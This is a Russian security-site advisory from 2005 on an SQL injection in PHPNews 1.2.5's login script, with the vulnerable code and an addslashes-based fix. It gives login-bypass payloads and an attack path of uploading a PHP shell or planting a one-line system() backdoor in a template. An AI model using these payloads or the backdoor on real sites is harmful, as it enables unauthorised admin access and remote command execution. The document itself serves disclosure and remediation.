СОДЕРЖАНИЕ:
  ДОМОЙ
  НОВОСТИ  
  IT АКАДЕМИЯ
  WAP-ВЕРСИЯ
  ФОРУМ
  БЕЗОПАСНОСТЬ
  ПРОГРАММИРОВАНИЕ
  ИНСТРУМЕНТ ВЕБМАСТЕРА
  ВСЁ ДЛЯ КПК
  СТАТЬИ NEW
  СОФТ
  ВИДЕО
  X-INFO
  ПРОКСИ ЛИСТ
  IT МУЗЫКА
  АНЕКДОТЫ
  ССЫЛКИ
  ТЕХ. ПОДДЕРЖКА
  ПРАВООБЛАДАТЕЛЯМ
  О НАС
ВАШ IP АДРЕС:
18.188.13.127
Человек на сайте На сайте: 416 человек(а)
Ђдминистрация никак не связан с авторами и содержимым ссылок
Рђеклама




Cервер : irc.comp-info.ru Порт : 6667 Канал : #comp-info


..:: Компьютерная безопасность ::..


Внимание !!! Attention !!!


Вся информация хранящаяся на сайте предоставлена исключительно в образовательных и познавательных целях. Мы рассчитываем на правильное ее использование, т. е. для повышения уровня защищенности компьютерных систем. Уважаемые посетители, мы надеемся на Вашу рассудительность. Администрация Comp-Info.ru снимает с себя ответственность за незаконное применение данных материалов. Мы хотим лишь ликвидировать необразованность администраторского состава, а так же помочь начинающим администраторам.

PHPNews 1.2.5 sql инъекция

8 ноября 2005 | ASSCOL | Security

Уязвимость:
Уязвимый скрипт: auth.php

Уязвимый код:
else if(isset($_POST['user']) && isset($_POST['password']))
{
$in_user = $_POST['user']; // <-- not filtered
$in_password = $_POST['password'];
}

$result = mysql_query('SELECT * FROM ' . $db_prefix . 'posters WHERE username = '' . $in_user . '' AND password = password('' . $in_password . '')');
$dbQueries++;

if(mysql_numrows($result) != 0)
{
$auth = true;
$_SESSION['user'] = $in_user;
$_SESSION['password'] = $in_password;
}


В случае, если параметр magic_quotes_gpc=0, атакующий может внедрить SQL инъекцию в переменную $_POST['user'].

Пример эксплуатации:
В поле «Username» , указываем «whatever' or '1'='1'/*», и
«whatever» в поле «Password»(без двойных кавычек).
Или просто используем — «admin'/*» в качестве имени пользователя (где «admin» — реальный логин для администратора).

Возможный сценарий атаки:
[1] Логинимся в admin panel, используя SQL инъекцию
[2] Загружаем PHP файл через «Upload Images» функцию (index.php?action=images) и получаем php shell или
редактируем шаблон (index.php?action=modtemp) и вставляем туда код для потайного хода (к примеру: if($_GET["hack"]) { system(«$_GET[»hack"]); } )

Устранение уязвимости:
Замените в коде auth.php, строчки:
$in_user = $_POST['user'];

на

if (!get_magic_quotes_gpc()) {$in_user=addslashes($_POST['user']); $in_password = addslashes($_POST['password']);}
else {$in_user = $_POST['user']; $in_password = $_POST['password'];}

**** ASSCOL ****

По всем вопросам и предложениям пишите на admin@comp-info.ru

/USR/MENU:
 ./HOME
 ./HOME/NEWS  
 ./HOME/IT_ACADEMY
 ./WAP
 ./FORUM
 ./SECURITY
 ./PROGRAMMING
 ./SOFT/4WEBMASTERS
 ./ALL4POCKETS
 ./USR/ARTICLESNEW
 ./TEMP/SOFT
 ./USR/ALL_VIDEO
 ./HOME/X-INFO
 ./TEMP/PROXYLIST
 ./IT_MUSIC
 ./JOKES
 ./HOME/LINKS
 ./USR/SUPPORT
 ./USR/POSSESSOR
 ./ABOUT_US
УТИЛИТЫ:

  Сниффер
  Лог сниффера
  MD5 и Base64
  Декодирование MD5 NEW
 Перекодировщик
  Проверить прокси
  Проверка анонимности
  Генерация пароля
  Скрипт определения IP
  Поиск информации
   Проверить IP (Whois)
   Узнать скорость закачки
   Добавить свой сайт в поисковые системы>
   Подсветка php-кода

ПОЛЕЗНАЯ ИНФОРМАЦИЯ:
  Список национальных доменных имен
  Компьютерные термины
  Смайлики
   Аналоги Win-программ в Linux
   Коды ответа HTTP сервера
   Записки невесты программиста

Опрос




Права на содержащиеся на сайте материалы принадлежат авторам.

Copyright Комп-Инфо.ру © 2005